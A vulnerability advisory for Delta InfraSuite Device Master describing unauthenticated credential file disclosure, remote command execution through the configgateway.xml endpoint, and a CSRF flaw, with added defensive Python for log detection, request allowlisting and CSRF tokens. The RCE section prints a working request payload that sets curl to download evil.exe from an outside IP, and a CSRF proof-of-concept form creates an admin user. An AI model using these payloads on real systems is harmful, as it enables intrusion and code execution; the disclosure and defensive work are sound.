RBS-2022-002 – Delta Infrasuite Device Master
Delta Infrasuite Device Master – Multiple Vulnerabilities
Vendor / Product information
“InfraSuite Device Master provides a rich set of capabilities that simplify and automate critical device monitoring. It allows users to observe the status of all devices, query event logs or history data, and assists users in taking appropriate action. With cost effective deployment, this software solution is scalable to match your business growth.”
Source:
https://www.deltapowersolutions.com/en/mcis/data-center-infrasuite-device-master.php
Vulnerable program details
Tested products and version:
Vendor: Delta Power Solutions
Product: InfraSuite Device Master
Version: 00.00.01a
Credits
Sven Krewitt, Flashpoint
Vulnerability details
The application provides a web interface for viewing the status and data of monitored devices. The documentation refers to this interface as the Web Monitor. This interface is affected by the following vulnerabilities.
WebEngineHandler::WebServerCallBack() Function Missing Authentication Remote Credential Disclosure
Requests to the web interface are handled in the WebEngineHandler::WebServerCallBack() function in ControlLayer.dll. The function parses incoming requests and invokes different functions depending on the request method and path.
When handling GET requests, the function does not enforce any authentication and allows any file to be requested, e.g. from the infrasuitemanager/ApRunning/ directory.
This allows access to the UserInfoList.xml and Gateway.xml files, which contain user credentials.
UserInfoList.xml:
<?xml version="1.0"?>
<XMLUserInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<userDataList>
<XMLUserData>
<userID>0</userID>
<account>Administrator</account>
<password>cGFzc3dvcmQ=</password> <!-- base64-encoded "password" -->
Gateway.xml:
<?xml version="1.0"?>
<XMLControlServerData xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<title>Gateway_Server</title>
<priNetSetting>
<ipAddress />
<portList />
</priNetSetting>
<secNetSetting>
<ipAddress />
<portList />
</secNetSetting>
<storageSetting>
<dbType>Postgres</dbType>
<dataSource>PostgreSQL35W</dataSource>
<account>postgres</account>
<password>Ems3000!</password>
<period>60</period>
The disclosure of the Administrator account password grants an attacker access to the web interface.
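Because the ApRunning/ files are served without any authentication, the only trace of a credential read is the GET request itself in the web server's access log. The following is an added detection example (not part of the advisory and not code from the product): it scans access-log lines for GET requests to the two credential files named above. The log format is assumed to be the common "combined" style; the regex would need adjusting for IIS W3C logs. Path matching folds case and percent-decoding, because the product runs on Windows, where the file system and, as the CSRF proof-of-concept's "Runningconfigure" spelling shows, the request paths are case-insensitive.

```python
import re
from urllib.parse import unquote, urlsplit

# Credential-bearing files under the unauthenticated ApRunning/ directory,
# as named in the advisory. Stored lower-case; matching folds case below.
SENSITIVE_PATHS = {
    "/infrasuitemanager/aprunning/userinfolist.xml",
    "/infrasuitemanager/aprunning/gateway.xml",
}

# Assumed "combined"-style access log line: ip ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize_path(target):
    """Reduce a request target to a canonical path for matching.

    Percent-decodes twice (to catch double encoding), turns backslashes into
    slashes, collapses repeated slashes and folds case, since the product runs
    on Windows where paths are case-insensitive.
    """
    path = urlsplit(target).path
    for _ in range(2):
        path = unquote(path)
    path = path.replace("\\", "/")
    while "//" in path:
        path = path.replace("//", "/")
    return path.lower()


def find_credential_file_reads(lines):
    """Return one finding per GET request for a credential file.

    Requests that were blocked (non-200) are still reported, because they show
    someone probing for the files; 'disclosed' tells the two cases apart.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m is None or m["method"] != "GET":
            continue
        path = normalize_path(m["target"])
        if path in SENSITIVE_PATHS:
            findings.append({
                "ip": m["ip"],
                "time": m["ts"],
                "path": path,
                # A 200 means the server actually handed the file out.
                "disclosed": m["status"] == "200",
            })
    return findings


# Constructed sample log lines (not from the advisory); the second one uses a
# percent-encoded dot and lower-case directory name to exercise normalization.
SAMPLE_LOG = [
    '192.168.50.129 - - [15/Aug/2022:05:52:00 +0000] "GET /infrasuitemanager/ApRunning/UserInfoList.xml HTTP/1.1" 200 1532',
    '192.168.50.129 - - [15/Aug/2022:05:52:03 +0000] "GET /infrasuitemanager/aprunning/Gateway%2Exml HTTP/1.1" 200 910',
    '10.0.0.5 - - [15/Aug/2022:06:10:11 +0000] "GET /infrasuitemanager/Web/index.html HTTP/1.1" 200 4021',
    '10.0.0.5 - - [15/Aug/2022:06:11:40 +0000] "POST /infrasuitemanager/runningconfigure/configgateway.xml HTTP/1.1" 200 12',
    '10.0.0.9 - - [15/Aug/2022:06:12:00 +0000] "GET /infrasuitemanager/ApRunning/UserInfoList.xml HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for finding in find_credential_file_reads(SAMPLE_LOG):
        print(finding)
```

Any hit with "disclosed": True should be treated as a credential compromise of the Administrator account and of the PostgreSQL account in Gateway.xml, and both passwords rotated.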
/infrasuitemanager/runningconfigure/configgateway.xml Endpoint Remote Command Execution
An administrative user can make minor configuration changes via the /infrasuitemanager/runningconfigure/configgateway.xml endpoint. In the web interface, this is limited to changing preferences and configuring web server ports.
However, depending on the XML contents of the respective HTTP request, other configuration options can be changed as well. This allows, for example, enabling the database backup option and setting the backup command and its arguments to arbitrary values. An attacker can configure a backup command that downloads and executes arbitrary files with the privileges of the ‘infrasuite’ user.
Decoded request payload:
xml=<CtrlLayerNWCommand_Gateway+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"+xmlns:xsd="http://www.w3.org/2001/XMLSchema"><i16OperationUserID>0</i16OperationUserID><i32SubCommand>2</i32SubCommand><configData><sNewServerData><title>Gateway_Server</title><sPriNetSetting><ipAddress>127.0.0.1</ipAddress><portList /></sPriNetSetting><sSecNetSetting><ipAddress>127.0.0.1</ipAddress><portList /></sSecNetSetting><sStorageSetting><dbType>Postgres</dbType><dataSource>PostgreSQL35W</dataSource><account>postgres</account><password>xEms3000!</password><period>60</period><enableThresholdToSaveData>false</enableThresholdToSaveData></sStorageSetting><sWebConfig><webRoot>Web</webRoot><bEnableHTTP>true</bEnableHTTP><bEnableHTTPS>true</bEnableHTTPS><i32HTTPPort>80</i32HTTPPort><i32HTTPSPort>443</i32HTTPSPort></sWebConfig><backupInfo><BackupInfoDatabase><Enable>true</Enable><PeriodType>Daily</PeriodType><Path>C:\tmpbackup</Path><ActionTime>2022-08-15T05:52:00</ActionTime><IsNetworkDrive>false</IsNetworkDrive><NetworkDriveSetting><RemotePath /><Account /><Password /></NetworkDriveSetting><ExeCommand>C:\Windows\System32\curl.exe</ExeCommand><ExeArguments>-o+C:\evil.exe+http://192.168.50.129/evil.exe</ExeArguments></BackupInfoDatabase><BackupInfoProjectFile><Enable>false</Enable><PeriodType>Monthly</PeriodType><Path /><IsNetworkDrive>false</IsNetworkDrive><NetworkDriveSetting><RemotePath /><Account /><Password /></NetworkDriveSetting><ActionTime>2016-12-14T14:00:00-08:00</ActionTime></BackupInfoProjectFile></backupInfo></sNewServerData></configData></CtrlLayerNWCommand_Gateway>
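The root cause is that the endpoint trusts whatever sNewServerData the client sends instead of restricting the request to the fields the web UI is allowed to change. The following is an added example of the server-side check that closes this (not part of the advisory and not the vendor's code): it parses a CtrlLayerNWCommand_Gateway request, applies only an allowlist of web-server fields, and rejects the whole request if any other field differs from the stored configuration. The stored configuration is assumed, for simplicity, to use the same sNewServerData element layout as the request; the sample documents are constructed.

```python
import xml.etree.ElementTree as ET

# Leaf elements, relative to sNewServerData, that the web UI's "preferences
# and web server ports" feature is meant to change. Everything else is locked.
ALLOWED_LEAVES = {
    "sWebConfig/bEnableHTTP",
    "sWebConfig/bEnableHTTPS",
    "sWebConfig/i32HTTPPort",
    "sWebConfig/i32HTTPSPort",
}


def leaf_paths(elem, prefix=""):
    """Yield (path, text) for every leaf element below elem."""
    for child in elem:
        path = prefix + child.tag
        if len(child):
            yield from leaf_paths(child, path + "/")
        else:
            yield path, (child.text or "").strip()


def check_value(path, text):
    """Type-check an allowed value; raise ValueError on anything unexpected."""
    if path.endswith("Port"):
        port = int(text)
        if not 1 <= port <= 65535:
            raise ValueError(f"{path}: port out of range")
    elif text not in ("true", "false"):  # the bEnable* flags
        raise ValueError(f"{path}: expected true/false")


def apply_web_ui_change(current_xml, request_xml):
    """Apply a configgateway.xml request against the stored configuration.

    Returns (new_config_xml, rejected_paths). If any element outside
    ALLOWED_LEAVES is unknown or differs from the stored value, nothing is
    applied and new_config_xml is None, so the request can be refused.
    """
    current = ET.fromstring(current_xml)
    request = ET.fromstring(request_xml)
    submitted = request.find("configData/sNewServerData")
    if submitted is None:
        raise ValueError("missing configData/sNewServerData")

    rejected, updates = [], {}
    for path, text in leaf_paths(submitted):
        stored = current.find(path)
        if path in ALLOWED_LEAVES and stored is not None:
            check_value(path, text)
            updates[path] = text
        elif stored is None or (stored.text or "").strip() != text:
            rejected.append(path)  # unknown element, or a locked value changed

    if rejected:
        return None, rejected
    for path, text in updates.items():
        current.find(path).text = text
    return ET.tostring(current, encoding="unicode"), []


def get_leaf(config_xml, path):
    """Read one leaf value back out of a configuration document."""
    elem = ET.fromstring(config_xml).find(path)
    return None if elem is None else (elem.text or "").strip()


# Constructed stored configuration (assumed layout, not the real Gateway.xml).
CURRENT_CONFIG = """<sNewServerData>
  <title>Gateway_Server</title>
  <sWebConfig>
    <webRoot>Web</webRoot>
    <bEnableHTTP>true</bEnableHTTP>
    <bEnableHTTPS>true</bEnableHTTPS>
    <i32HTTPPort>80</i32HTTPPort>
    <i32HTTPSPort>443</i32HTTPSPort>
  </sWebConfig>
  <backupInfo>
    <BackupInfoDatabase>
      <Enable>false</Enable>
      <Path />
      <ExeCommand />
      <ExeArguments />
    </BackupInfoDatabase>
  </backupInfo>
</sNewServerData>"""


def make_request(server_data_xml):
    """Wrap an sNewServerData document in the request envelope seen above."""
    return ('<CtrlLayerNWCommand_Gateway xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
            '<i16OperationUserID>0</i16OperationUserID><i32SubCommand>2</i32SubCommand>'
            '<configData>' + server_data_xml + '</configData></CtrlLayerNWCommand_Gateway>')


# What the UI legitimately sends: only the HTTP port changed.
BENIGN_REQUEST = make_request(CURRENT_CONFIG.replace("<i32HTTPPort>80<", "<i32HTTPPort>8080<"))

# A request that also turns on the backup job and sets its command (placeholder path).
MALICIOUS_REQUEST = make_request(
    CURRENT_CONFIG.replace("<Enable>false</Enable>", "<Enable>true</Enable>")
                  .replace("<ExeCommand />", r"<ExeCommand>C:\placeholder\attacker.exe</ExeCommand>")
)

if __name__ == "__main__":
    print(apply_web_ui_change(CURRENT_CONFIG, BENIGN_REQUEST)[1])     # []
    print(apply_web_ui_change(CURRENT_CONFIG, MALICIOUS_REQUEST)[1])  # the two locked paths
```

xml.etree.ElementTree is used here for portability; it does not defend against entity-expansion attacks, so a production handler should parse with defusedxml or an equivalently hardened parser.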
Web Interface User Creation CSRF
The web interface is affected by a cross-site request forgery (CSRF) vulnerability, as performing sensitive actions does not require multiple steps, explicit confirmation, or a unique token. By tricking a user into following a specially crafted link, an attacker can cause the victim’s browser to send a request to the web interface that creates a new administrative user.
Proof-of-concept:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.50.128/infrasuitemanager/Runningconfigure/adduser.xml" method="POST">
<input type="hidden" name="opUserID" value="0" />
<input type="hidden" name="Account" value="test2" />
<input type="hidden" name="Password" value="123qwe" />
<input type="hidden" name="Name" value="" />
<input type="hidden" name="Department" value="" />
<input type="hidden" name="Company" value="" />
<input type="hidden" name="Professional" value="Service" />
<input type="hidden" name="JobNumber" value="" />
<input type="hidden" name="HomePhone" value="" />
<input type="hidden" name="OfficePhone" value="" />
<input type="hidden" name="PriMobilePhone" value="" />
<input type="hidden" name="SecMobilePhone" value="" />
<input type="hidden" name="PriEmail" value="" />
<input type="hidden" name="SecEmail" value="" />
<input type="hidden" name="Remark" value="" />
<input type="hidden" name="EnabledStatus" value="1" />
<input type="hidden" name="DoorAccessVerifyID" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
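The proof-of-concept works because adduser.xml accepts any well-formed POST carrying a valid session cookie. The following is an added example of the standard two-layer defence (not part of the advisory and not the vendor's code): a per-session synchronizer token that the real form carries as a hidden field and that a page on another origin cannot read, plus a check that the browser-set Origin (or Referer) header names the site itself. SITE_ORIGIN is assumed from the PoC's target address; the request scenarios are constructed.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Origin the web interface is served from (assumed from the PoC target).
SITE_ORIGIN = "http://192.168.50.128"


def issue_csrf_token(session):
    """Create a per-session synchronizer token and store it in the session.

    The server renders the token into the genuine adduser form as a hidden
    field; the same-origin policy stops another site from reading it.
    """
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def same_origin(headers):
    """Second layer: the browser-set Origin (or Referer) must be our site."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False  # fail closed when neither header is present
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin.lower() == SITE_ORIGIN.lower()


def authorize_adduser(session, headers, form):
    """Decide whether a POST to adduser.xml may be processed.

    Returns (allowed, reason). Both checks must pass: the browser-attested
    origin and the secret token only a same-origin page could have read.
    """
    if not same_origin(headers):
        return False, "cross-origin request"
    expected = session.get("csrf_token", "")
    presented = form.get("csrf_token", "")
    # Constant-time comparison on bytes; str compare_digest rejects non-ASCII input.
    if not expected or not hmac.compare_digest(expected.encode(), presented.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


if __name__ == "__main__":
    # Constructed scenario: an administrator session that has loaded the real form.
    session = {"user": "Administrator"}
    token = issue_csrf_token(session)

    legit_headers = {"Origin": SITE_ORIGIN}
    legit_form = {"opUserID": "0", "Account": "ops", "Password": "placeholder", "csrf_token": token}
    print(authorize_adduser(session, legit_headers, legit_form))   # (True, 'ok')

    # What the PoC page above produces: a cross-origin auto-submitted form, no token.
    forged_headers = {"Origin": "http://attacker.example"}
    forged_form = {"opUserID": "0", "Account": "test2", "Password": "123qwe"}
    print(authorize_adduser(session, forged_headers, forged_form))  # (False, 'cross-origin request')
```

Marking the session cookie SameSite=Lax (or Strict) adds a third layer, but the token check is the one that does not depend on browser behaviour, so it should stay even when SameSite is set.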
Solution
Disable or restrict network access to the web interface.
References
VulnDB: 298295, 298296, 298297
Timeline
2022-07-15: Initial contact per email
2022-07-21: Contact via web form
2022-08-01: Sent reminder
2022-08-08: Sent final notice via email and web form
2022-08-15: Disclosure